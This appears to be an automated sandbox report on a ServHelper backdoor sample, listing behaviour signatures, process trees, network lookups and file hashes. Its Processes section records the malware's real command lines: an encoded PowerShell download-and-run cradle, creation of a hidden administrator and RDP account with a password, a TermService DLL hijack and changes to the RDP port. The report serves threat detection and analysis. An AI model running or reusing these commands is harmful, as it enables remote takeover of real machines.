Malware Analysis Report

2024-10-19 04:37

Sample ID 210924-1kw5xaaabj
Target 83d119a963e7050995f9bf6be8841b95
SHA256 d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486

Threat Level: Known bad

The file 83d119a963e7050995f9bf6be8841b95 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Possible privilege escalation attempt

UPX packed file

Blocklisted process makes network request

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Modifies registry key

Script User-Agent

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-24 21:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 21:43

Reported

2021-09-24 21:45

Platform

win7-en-20210920

Max time kernel

128s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49VXKDUQCCZZW4FQX540.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d05927418db1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1576 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pm_nohl0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB8B3.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc RLGy6HnU /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc RLGy6HnU /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc RLGy6HnU /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc RLGy6HnU

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc RLGy6HnU

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc RLGy6HnU

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asfggagsa3.xyz udp

Files

memory/1432-53-0x0000000041660000-0x0000000041A5F000-memory.dmp

memory/1432-55-0x00000000411E2000-0x00000000411E4000-memory.dmp

memory/1432-58-0x00000000411E7000-0x00000000411E8000-memory.dmp

memory/1432-57-0x00000000411E6000-0x00000000411E7000-memory.dmp

memory/1432-56-0x00000000411E4000-0x00000000411E6000-memory.dmp

memory/1928-59-0x0000000000000000-mapping.dmp

memory/1928-60-0x000007FEFBFD1000-0x000007FEFBFD3000-memory.dmp

memory/1928-61-0x000007FEEB1C0000-0x000007FEEBD1D000-memory.dmp

memory/1928-62-0x00000000024C0000-0x00000000024C2000-memory.dmp

memory/1928-64-0x00000000024C2000-0x00000000024C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1928-65-0x00000000024C4000-0x00000000024C7000-memory.dmp

memory/1928-66-0x00000000024CB000-0x00000000024EA000-memory.dmp

memory/1592-67-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pm_nohl0.cmdline

MD5 a3432e839a8f933a422cb56167011d84
SHA1 b303f42b8b44f58286bc6b8f80e7d4968eeffbe3
SHA256 f5f77e75d66d1cef9cf580a0f4ba2396c0cb8888971b5d949ed77a94955351bd
SHA512 3a1181f6c15af22cfa7b0d181ff2b85b899a0ef837090f83eca7f2da4e7fb6dc544c9636df5b0079fe5cdba87498c1ae856f3177ec91d0b979d6a2e05cb27d36

\??\c:\Users\Admin\AppData\Local\Temp\pm_nohl0.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/608-70-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCB8B3.tmp

MD5 75309916e18fb3cd86d3609939627e3a
SHA1 bc513c7ef162afbdb72e7524226d7b577971ff87
SHA256 26722b9dfa4930a4f05553a79c4b012f4aed90f4feedb8b12bcf3097753e6dc4
SHA512 109a7a5087a0a2ba43049980870cd229a1b7ed45d430bd87eba0fbdeef18c03421d2d1f7dcb48bb97d568f8496267fce0eaf1a99221056f1d002d387ba7748f3

C:\Users\Admin\AppData\Local\Temp\RESB8B4.tmp

MD5 6f02a8cad7472130729e6d4e094cdc53
SHA1 a241e4750ba47d192ef75787408979766974ae23
SHA256 7bc1d0bb89accd9dba9fc36042ffd7c2a0d23d80b37bf5da38e969e376d55d6d
SHA512 902d03baa4a3f9d6cecdf5ad02555a58a3bdbd3eae6b147d7e563851ea52188ff7bc5bc7f1883c6e18ff79ab0c2eaa995b659ab9f546af69cebb65e109f07e29

C:\Users\Admin\AppData\Local\Temp\pm_nohl0.dll

MD5 d83562f098cd389d1c57e3c70d36c6c9
SHA1 fc5b0f9ba4c94f2ab6f7e152c25c2eaad7201a65
SHA256 54bbb087b5d0e512ee0e44dd86687cdf4091ad8a10611510cbc6b5453e735e14
SHA512 60372bd5400eebb49c9525263b3b687e7747965248525db6976dd65d9fdd0d92190e7e0ad7ac06810ca0683be1993ace20f67f8b05695fb3877d1c0a220ad1a5

C:\Users\Admin\AppData\Local\Temp\pm_nohl0.pdb

MD5 d12b2ebe441a21e4667dc88a52a3e95c
SHA1 eb9434b9316d92f27636ecf3fb678e0914a07f52
SHA256 00810f4bf2e90efdf35e1818dcc0bd4dc2e29cdba95700414dbb08b71e655e16
SHA512 008921de3c674c65b639fe8cc3de8be16f9ee7fd1d7c5f9eec71bf402118968350cda6173f25370069c0f32b91772c51d33284f47cf1509633e070d193c09fc0

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9d21abc1a799ae0ea31258d563532295
SHA1 a9cde90ba328e30a3eb7a5c410b304a4ae09cdba
SHA256 8075e676d039b5791405f3ab00787a16199920dfe025ff04359b953565bf6f2f
SHA512 b9324c8b4af372a89aaa8c864dab88e74fdd820b28b6fe03897151e23de01b0a0857959e0e023340e4dd18ba0a6dad2faaf365580769b3a473070457b72b3065

memory/1592-76-0x0000000002000000-0x0000000002002000-memory.dmp

memory/1928-77-0x00000000024ED000-0x00000000024EE000-memory.dmp

memory/908-78-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e2967258866267f5cd57ee6467242892
SHA1 9883cb588b447a714b0959191dca85b6a1584b5c
SHA256 fe0608643e423e1b9e375b8910848e999c48aaae2ec44e90f07f8e06f09be74a
SHA512 019630a91cf729ff337cbaec81680a9905bd32ef624981c647e5b2dc7ee04aa91bf64aca027a679e9e2af75ecd44671b7503e785bc0feae9895b9cfef2b0f991

memory/908-81-0x000007FEEB1C0000-0x000007FEEBD1D000-memory.dmp

memory/908-82-0x0000000002420000-0x0000000002422000-memory.dmp

